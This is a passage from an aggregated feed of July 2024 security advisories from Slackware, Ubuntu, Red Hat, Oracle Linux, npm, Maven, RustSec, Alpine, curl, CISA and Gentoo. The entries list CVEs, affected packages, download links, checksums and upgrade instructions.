OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/aaa_glibc-solibs-2.33-i586-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-2.33-i586-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-i18n-2.33-i586-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-profile-2.33-i586-7_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/aaa_glibc-solibs-2.33-x86_64-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-2.33-x86_64-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-i18n-2.33-x86_64-7_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/glibc-profile-2.33-x86_64-7_slack15.0.txzUpdated packages for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/aaa_glibc-solibs-2.40-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.40-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.40-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.40-i686-1.txzUpdated packages for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/aaa_glibc-solibs-2.40-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.40-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.40-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.40-x86_64-1.txzMD5 signaturesSlackware 15.0 packages:66f7ee59e3665668d791b8c4e5de48ed aaa_glibc-solibs-2.33-i586-7_slack15.0.txz4d45eb6472c1ebb81c60eb8b3d6bf1a1 glibc-2.33-i586-7_slack15.0.txz7a0678e346991c74368cd2f00c36bc2a glibc-i18n-2.33-i586-7_slack15.0.txz1d69d0c0e313aa8858dde9ded66da53d glibc-profile-2.33-i586-7_slack15.0.txzSlackware x86_64 15.0 packages:8988733b34ff060b8d21645fbcdc7865 aaa_glibc-solibs-2.33-x86_64-7_slack15.0.txz73bacfb1b9dad7413a3f28f3569a5e31 glibc-2.33-x86_64-7_slack15.0.txzb94067e08eefe91cc6653f2d2b227c93 glibc-i18n-2.33-x86_64-7_slack15.0.txzd3233661b844b3ff85f526e2144d29f9 glibc-profile-2.33-x86_64-7_slack15.0.txzSlackware -current packages:5e75b97b86d815f783d154c45684ee9d a/aaa_glibc-solibs-2.40-i686-1.txz4289505bfb9560119a23d8f59878eb5e l/glibc-2.40-i686-1.txzf74f6235a46e94c480f91a0055d032ed l/glibc-i18n-2.40-i686-1.txz1e8f0a3f3b5896bfbab3c555cb0ca373 l/glibc-profile-2.40-i686-1.txzSlackware x86_64 -current packages:9723996a8d43c5c002efcd107e3f30bc a/aaa_glibc-solibs-2.40-x86_64-1.txzc239b1893aa82ddfe7c8f03a993bfc32 l/glibc-2.40-x86_64-1.txz49426d6a57eae1177a51595fa7907ed5 l/glibc-i18n-2.40-x86_64-1.txz3c23430267ab63eb71a1917b6acf942b l/glibc-profile-2.40-x86_64-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg glibc-*.txz `	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-02
23.07.2024 22:08:45	slackware	[SSA:2024-205-01] bind (high)	New bind packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/bind-9.18.28-i586-1_slack15.0.txz: Upgraded. Please note that we have moved to the 9.18 branch, as 9.16 is EOL. This update fixes security issues: Remove SIG(0) support from named as a countermeasure for CVE-2024-1975. qctx-zversion was not being cleared when it should have been leading to an assertion failure if it needed to be reused. An excessively large number of rrtypes per owner can slow down database query processing, so a limit has been placed on the number of rrtypes that can be stored per owner (node) in a cache or zone database. This is configured with the new "max-rrtypes-per-name" option, and defaults to 100. Excessively large rdatasets can slow down database query processing, so a limit has been placed on the number of records that can be stored per rdataset in a cache or zone database. This is configured with the new "max-records-per-type" option, and defaults to 100. Malicious DNS client that sends many queries over TCP but never reads responses can cause server to respond slowly or not respond at all for other clients. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-1975 https://www.cve.org/CVERecord?id=CVE-2024-4076 https://www.cve.org/CVERecord?id=CVE-2024-1737 https://www.cve.org/CVERecord?id=CVE-2024-0760 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bind-9.18.28-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bind-9.18.28-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.18.28-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.18.28-x86_64-1.txzMD5 signaturesSlackware 15.0 package:954f9cca537e723f6c4bfdbb469b4f95 bind-9.18.28-i586-1_slack15.0.txzSlackware x86_64 15.0 package:35f81a16cb25fe6d13254d823ca400e3 bind-9.18.28-x86_64-1_slack15.0.txzSlackware -current package:bfdca4639f7dda0753bacd2aa1bbb613 n/bind-9.18.28-i686-1.txzSlackware x86_64 -current package:f8e130f5a00b026e43f92aacda745b6c n/bind-9.18.28-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg bind-9.18.28-i586-1_slack15.0.txz`Then, restart the name server:`# /etc/rc.d/rc.bind restart`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-01
23.07.2024 19:55:58	ubuntu	[USN-6530-2] HAProxy vulnerability (high)	HAProxy could be made to expose sensitive information.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6530-2
23.07.2024 19:41:30	ubuntu	[USN-6911-1] Nova vulnerability	Nova would allow unintended access to files over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6911-1
23.07.2024 19:26:54	npm	[NPM:GHSA-G3CH-RX76-35FX] vue-template-compiler vulnerable to client-side Cross-Site Scripting (XSS) (moderate)	A vulnerability has been discovered in vue-template-compiler, that allows an attacker to perform XSS via prototype pollution. The attacker could change the prototype chain of some properties such as `Object.prototype.staticClass` or `Object.prototype.staticStyle` to execute arbitrary JavaScript code. Vue 2 has reached End-of-Life. This vulnerability has been patched in Vue 3.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G3CH-RX76-35FX
23.07.2024 18:24:29	ubuntu	[USN-6907-1] Squid vulnerability (medium)	Squid could be made to crash if it processed specially crafted characters.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6907-1
23.07.2024 17:19:48	ubuntu	[USN-6909-1] Bind vulnerabilities (high)	Several security issues were fixed in Bind.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-1
23.07.2024 18:51:55	npm	[NPM:GHSA-8H55-Q5QQ-P685] (ReDoS) Regular Expression Denial of Service in tf2-item-format (high)	## SummaryVersions of `tf2-item-format` since at least `4.2.6` are vulnerable to a Regular Expression Denial of Service (ReDoS) attack when parsing crafted user input. ## Tested Versions- `5.9.13`- `5.8.10`- `5.7.0`- `5.6.17`- `4.3.5`- `4.2.6`### v5Upgrade package to `^5.9.14`### v4No patch exists. Please consult the [v4 to v5 migration guide](https://github.com/danocmx/node-tf2-item-format?tab=readme-ov-file#migrating-from-v4-to-v5) to upgrade to v5.If upgrading to v5 is not possible, fork the module repository and implement the fix detailed below.## ImpactThis vulnerability can be exploited by an attacker to perform DoS attacks on any service that uses any `tf2-item-format` to parse user input.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8H55-Q5QQ-P685
23.07.2024 17:03:15	ubuntu	[USN-6908-1] Tomcat vulnerabilities (high)	Several security issues were fixed in Tomcat.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6908-1
23.07.2024 16:28:09	ubuntu	[USN-6906-1] python-zipp vulnerability (medium)	python-zipp could be made to denial of service if certain zip files areused.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6906-1
23.07.2024 12:43:14	ubuntu	[USN-6898-4] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-4
23.07.2024 12:12:48	ubuntu	[USN-6893-3] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-3
23.07.2024 10:58:00	ubuntu	[USN-6896-5] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-5
23.07.2024 03:16:09	ubuntu	[USN-6905-1] Rack vulnerabilities (high)	Rack could be made to consume resources and cause long delays if itprocessed certain input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6905-1
23.07.2024 03:00:00	cisa	[CISA-2024:0723] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (high)	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0723
23.07.2024 03:00:00	oraclelinux	[ELSA-2024-4720] httpd:2.4 security update (important)	httpd[2.4.37-65.0.1.1]- Replace index.html with Oracle's index page oracle_index.html[2.4.37-65.1]- Resolves: RHEL-45812 - httpd:2.4/httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)- Resolves: RHEL-45785 - httpd:2.4/httpd: Encoding problem in mod_proxy (CVE-2024-38473)- Resolves: RHEL-45777 - httpd:2.4/httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)- Resolves: RHEL-45758 - httpd:2.4/httpd: null pointer dereference in mod_proxy (CVE-2024-38477)- Resolves: RHEL-45743 - httpd:2.4/httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)mod_http2mod_md	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4720
23.07.2024 03:00:00	oraclelinux	[ELSA-2024-4726] httpd security update (important)	[2.4.57-11.0.1]- Replace index.html with Oracle's index page oracle_index.html.[2.4.57-11]- Resolves: RHEL-45792 - httpd: Encoding problem in mod_proxy (CVE-2024-38473)[2.4.57-9]- Resolves: RHEL-45766 - httpd: null pointer dereference in mod_proxy (CVE-2024-38477)- Resolves: RHEL-45749 - httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)- Resolves: RHEL-45818 - httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)- Resolves: RHEL-45771 - httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4726
23.07.2024 03:00:00	redhat	[RHSA-2024:4720] httpd:2.4 security update (important)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Encoding problem in mod_proxy (CVE-2024-38473)* httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)* httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)* httpd: NULL pointer dereference in mod_proxy (CVE-2024-38477)* httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4720
23.07.2024 03:00:00	redhat	[RHSA-2024:4713] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: TIPC message reassembly use-after-free remote code execution vulnerability (CVE-2024-36886)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4713
23.07.2024 03:00:00	redhat	[RHSA-2024:4726] httpd security update (important)	The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)* httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)* httpd: null pointer dereference in mod_proxy (CVE-2024-38477)* httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)* httpd: Encoding problem in mod_proxy (CVE-2024-38473)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4726
23.07.2024 03:00:00	redhat	[RHSA-2024:4749] edk2 security update (moderate)	EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* EDK2: integer overflow in CreateHob() could lead to HOB OOB R/W (CVE-2022-36765)* edk2: Predictable TCP Initial Sequence Numbers (CVE-2023-45236)* edk2: Use of a Weak PseudoRandom Number Generator (CVE-2023-45237)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4749
23.07.2024 03:00:00	redhat	[RHSA-2024:4756] libuv security update (moderate)	libuv is a multi-platform support library with a focus on asynchronous I/O. Security Fix(es):* libuv: Improper Domain Lookup that potentially leads to SSRF attacks (CVE-2024-24806)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4756
23.07.2024 03:00:00	redhat	[RHSA-2024:4757] libvirt security update (moderate)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution forLinux on numerous hardware platforms. The virt:rhel module contains packageswhich provide user-space components used to run virtual machines using KVM.The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* libvirt: stack use-after-free in virNetClientIOEventLoop() (CVE-2024-4418)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4757
23.07.2024 03:00:00	redhat	[RHSA-2024:4762] runc security update (important)	The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4762
23.07.2024 03:00:00	redhat	[RHSA-2024:4766] python3 security update (low)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4766
23.07.2024 03:00:00	redhat	[RHSA-2024:4774] linux-firmware security update (moderate)	The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* kernel: Reserved fields in guest message responses may not be zero initialized (CVE-2023-31346)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4774
23.07.2024 03:00:00	redhat	[RHSA-2024:4776] cups security update (moderate)	The Common UNIX Printing System (CUPS) provides a portable printing layer for Linux, UNIX, and similar operating systems.Security Fix(es):* cups: Cupsd Listen arbitrary chmod 0140777 (CVE-2024-35235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4776
23.07.2024 03:00:00	redhat	[RHSA-2024:4779] python3 security update (low)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4779
23.07.2024 03:00:00	redhat	[RHSA-2024:4755] libreoffice security update (moderate)	LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: create a document which without prompt will execute scripts built-into LibreOffice on clicking a graphic (CVE-2024-3044)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4755
23.07.2024 03:00:00	redhat	[RHSA-2024:4761] containernetworking-plugins security update (important)	The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted. Security Fix(es):* golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4761
23.07.2024 21:54:53	rustsec	[RUSTSEC-2024-0358] Apache Arrow Rust Object Store: AWS WebIdentityToken exposure in log files	Exposure of temporary credentials in logs in Apache Arrow Rust Object Store,version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens.On certain error conditions, the logs may contain the OIDC token passed to[AssumeRoleWithWebIdentity](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html).This allows someone with access to the logs to impersonate that identity,including performing their own calls to AssumeRoleWithWebIdentity, until theOIDC token expires. Typically OIDC tokens are valid for up to an hour, althoughthis will vary depending on the issuer.Users are recommended to use a different AWS authentication mechanism, disablelogging or upgrade to version 0.10.2, which fixes this issue.## DetailsWhen using AWS WebIdentityTokens with the `object_store` crate, in the event ofa failure and automatic retry, the underlying `reqwest` error, including thefull URL with the credentials, potentially in the parameters, is written to thelogs.Thanks to Paul Hatcherian for reporting this vulnerability	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0358
25.07.2024 05:46:47	slackware	[SSA:2024-206-02] libxml2	New libxml2 packages are available for Slackware XXX 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libxml2-2.11.9-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: Fix XXE protection in downstream code. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-40896 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libxml2-2.11.9-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libxml2-2.11.9-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.13.3-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.13.3-x86_64-1.txzMD5 signaturesSlackware 15.0 package:a52692a6f8bd22e350cd31258287dee0 libxml2-2.11.9-i586-1_slack15.0.txzSlackware x86_64 15.0 package:a585d867386e1ae2c77a136d2162ca09 libxml2-2.11.9-x86_64-1_slack15.0.txzSlackware -current package:9a5aca640e5a4ed4fbb807e1a1749993 l/libxml2-2.13.3-i686-1.txzSlackware x86_64 -current package:314261f48d01111c5c3651e326685462 l/libxml2-2.13.3-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libxml2-2.11.9-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-206-02
25.07.2024 05:46:25	slackware	[SSA:2024-206-01] htdig (medium)	New htdig packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/htdig-3.2.0b6-i586-10_slack15.0.txz: Rebuilt. Patch XSS vulnerability. Thanks to jayjwa. Get this out of cgi-bin. Thanks to LuckyCyborg. For more information, see: https://www.cve.org/CVERecord?id=CVE-2007-6110 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/htdig-3.2.0b6-i586-10_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/htdig-3.2.0b6-x86_64-10_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/htdig-3.2.0b6-i686-10.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/htdig-3.2.0b6-x86_64-10.txzMD5 signaturesSlackware 15.0 package:70819a04ea4b36bfb9efa26a868d6860 htdig-3.2.0b6-i586-10_slack15.0.txzSlackware x86_64 15.0 package:42c3793f0892367d1e3c827d3723c633 htdig-3.2.0b6-x86_64-10_slack15.0.txzSlackware -current package:71cc9999ea5893b2781913f4b3c8900c n/htdig-3.2.0b6-i686-10.txzSlackware x86_64 -current package:1cfe6808cf5c7cc0e203f009ee584e98 n/htdig-3.2.0b6-x86_64-10.txzInstallation instructions*Upgrade the package as root:`# upgradepkg htdig-3.2.0b6-i586-10_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-206-01
24.07.2024 23:07:52	ubuntu	[USN-6915-1] poppler vulnerability (high)	poppler could be made to denial of service if it opened a specially crafted PDF.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6915-1
24.07.2024 22:22:11	ubuntu	[USN-6914-1] OCS Inventory vulnerability (high)	OCS Inventory was vulnerable to an authentication bypass if theselected authentication method was via CAS.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6914-1
24.07.2024 21:45:17	ubuntu	[USN-6913-1] phpCAS vulnerability (high)	phpCAS was vulnerable to an authentication bypass.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6913-1
24.07.2024 20:15:11	alpinelinux	[ALPINE:CVE-2024-41110] docker vulnerability (critical)	[From CVE-2024-41110] Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.docker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.0, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-41110
24.07.2024 19:02:36	maven	[MAVEN:GHSA-V62G-JWJ9-RFVX] XML External Entity Reference (XXE) in the XML Format Plugin in Apache Drill (moderate)	XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V62G-JWJ9-RFVX
24.07.2024 17:59:49	maven	[MAVEN:GHSA-8GJ9-R4HV-3JJW] Apache Pinot: Unauthorized endpoint exposed sensitive information (high)	Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Pinot.This issue affects Apache Pinot: from 0.1 before 1.0.0.Users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue.Details: When using a request to path `/appconfigs` to the controller, it can lead to the disclosure of sensitive information such as system information (e.g. arch, os version), environment information (e.g. maxHeapSize) and Pinot configurations (e.g. zookeeper path). This issue was addressed by the Role-based Access Control https://docs.pinot.apache.org/operators/tutorials/authentication/basic-auth-access-control , so that `/appConfigs` and all other APIs can be access controlled. Only authorized users have access to it. Note the user needs to add the admin role accordingly to the RBAC guide to control access to this endpoint, and in the future version of Pinot, a default admin role is planned to be added.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8GJ9-R4HV-3JJW
24.07.2024 11:18:12	ubuntu	[USN-6912-1] provd vulnerability (high)	provd could be made to run programs as an administrator.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6912-1
24.07.2024 11:15:03	alpinelinux	[ALPINE:CVE-2024-6197] curl vulnerability	[From CVE-2024-6197] libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. Itcan detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte localstack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6197
24.07.2024 11:15:03	alpinelinux	[ALPINE:CVE-2024-6874] curl vulnerability	[From CVE-2024-6874] libcurl's URL API function[curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycodeconversions, to and from IDN. Asking to convert a name that is exactly 256bytes, libcurl ends up reading outside of a stack based buffer when built touse the macidn IDN backend. The conversion function then fills up theprovided buffer exactly - but does not null terminate the string.This flaw can lead to stack contents accidently getting returned as part ofthe converted string.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6874
24.07.2024 02:42:05	curl	[CURL-CVE-2024-6874] macidn punycode buffer overread (low)	libcurl's URL API function[curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycodeconversions, to and from IDN. Asking to convert a name that is exactly 256bytes, libcurl ends up reading outside of a stack based buffer when built touse the macidn IDN backend. The conversion function then fills up theprovided buffer exactly - but does not null terminate the string.This flaw can lead to stack contents accidently getting returned as part ofthe converted string.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6874
24.07.2024 02:42:05	curl	[CURL-CVE-2024-6197] freeing stack buffer in utf8asn1str (medium)	libcurl's ASN1 parser has this utf8asn1str() function used for parsing anASN.1 UTF-8 string. It can detect an invalid field and return error.Unfortunately, when doing so it also invokes `free()` on a 4 byte local stackbuffer.Most modern malloc implementations detect this error and immediately abort.Some however accept the input pointer and add that memory to its list ofavailable chunks. This leads to the overwriting of nearby stack memory. Thecontent of the overwrite is decided by the `free()` implementation; likely tobe memory pointers and a set of flags.The most likely outcome of exploting this flaw is a crash, although it cannotbe ruled out that more serious results can be had in special circumstances.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-6197
24.07.2024 07:36:42	ubuntu	[USN-6906-1] python-zipp vulnerability (medium)	python-zipp could be made to crash if certain zip files are used.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6906-1
24.07.2024 03:00:00	gentoo	[GLSA-202407-26] Dmidecode: Privilege Escalation (normal)	A vulnerability has been discovered in Dmidecode, which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-26
24.07.2024 03:00:00	gentoo	[GLSA-202407-27] ExifTool: Multiple vulnerabilities (normal)	Multiple vulnerabilities have been discovered in ExifTool, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-27
24.07.2024 03:00:00	gentoo	[GLSA-202407-28] Freenet: Deanonymization Vulnerability (normal)	A vulnerability has been discovered in Freenet, which can lead to deanonymization due to path folding.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-28
